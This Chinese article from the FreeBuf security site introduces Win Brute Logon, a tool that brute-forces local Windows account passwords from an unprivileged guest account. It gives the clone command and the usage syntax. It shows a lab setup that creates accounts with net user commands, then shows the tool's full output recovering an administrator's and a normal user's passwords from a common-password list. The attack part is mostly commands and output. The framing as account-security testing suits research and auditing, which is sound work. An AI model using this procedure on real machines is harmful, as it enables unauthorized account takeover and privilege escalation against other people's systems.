freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用Win Brute Logon测试Windows账号的安全性
2022-03-14 00:43:40
所属地 广西

关于Win Brute Logon

Win Brute Logon是一款功能强大的Windows用户账号安全测试工具,在该工具的帮助下,广大研究人员可以直接测试任意Windows用户账号的安全,包括来宾账号在内,而且不需要任何特殊权限。

工作原理

该工具主要针对的是微软Windows身份验证机制中的一个安全问题,该问题的关键点就在于缺乏执行此类操作所需的特权。在这种情况下,任何用户都可以通过来宾帐户(Microsoft Windows上最有限的帐户)破解任何本地用户的密码。

最新版本的Win Brute Logon支持Stdin字典,并进行了少量代码优化。工具使用了多线程机制,并且支持32位和64位。

工具下载

广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/DarkCoderSc/win-brute-logon.git

下载下来之后,我们就可以从源码目录中找到对应Windows版本(32位或64位)的WinBruteLogon.exe程序了。

工具使用

字典文件

WinBruteLogon.exe -u <username> -w <wordlist_file>

Stdin字典

type <wordlist_file> | WinBruteLogon.exe -u <username> -

工具运行

创建一个新的管理员用户

net user darkcodersc /add

net user darkcodersc trousers (密码为trousers)

net localgroup administrators darkcodersc /add

创建一个普通用户

net user HackMe /add

net user HackMe ozlq6qwm (密码为ozlq6qwm)

创建一个新的来宾账号

net user GuestUser /add

net localgroup users GuestUser /delete

net localgroup guests GuestUser /add

生成一个字典

字典文件:【点我获取

执行测试

首先,从管理员帐户注销或重新启动计算机并登录到来宾帐户。然后,将Win Brute Logon可执行程序复制到来宾账户可以访问的任何位置。并运行下列命令:

WinBruteLogon.exe -v -u <username> -w <wordlist_file>

测试第一个用户:darkcodersc(管理员)

WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

测试结果如下:

[ .. ] Load 10k-most-common.txt file in memory...

[DONE] 10002 passwords successfully loaded.

[INFO] 2 cores are available

[ .. ] Create 2 threads...

[INFO] New "TWorker" Thread created with id=2260, handle=364

[INFO] New "TWorker" Thread created with id=3712, handle=532

[DONE] Done.

[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]

[ .. ] Finalize and close worker threads...

[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.

[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.

[DONE] Done.

[INFO] Ellapsed Time : 00:00:06

测试第二个用户:HackMe(普通用户)

WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

测试结果如下:

[ .. ] Load 10k-most-common.txt file in memory...

[DONE] 10002 passwords successfully loaded.

[INFO] 2 cores are available

[ .. ] Create 2 threads...

[INFO] New "TWorker" Thread created with id=5748, handle=336

[INFO] New "TWorker" Thread created with id=4948, handle=140

[DONE] Done.

[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]

[ .. ] Finalize and close worker threads...

[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.

[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.

[DONE] Done.

[INFO] Ellapsed Time : 00:00:06

工具运行测试PoC

测试目标:Windwos XP到最新版本的Windows 10(1909)

漏洞位置:LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW

项目地址

Win Brute Logon:GitHub传送门

参考资料

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt

# 系统安全 # Windows账号安全 # Windows用户安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录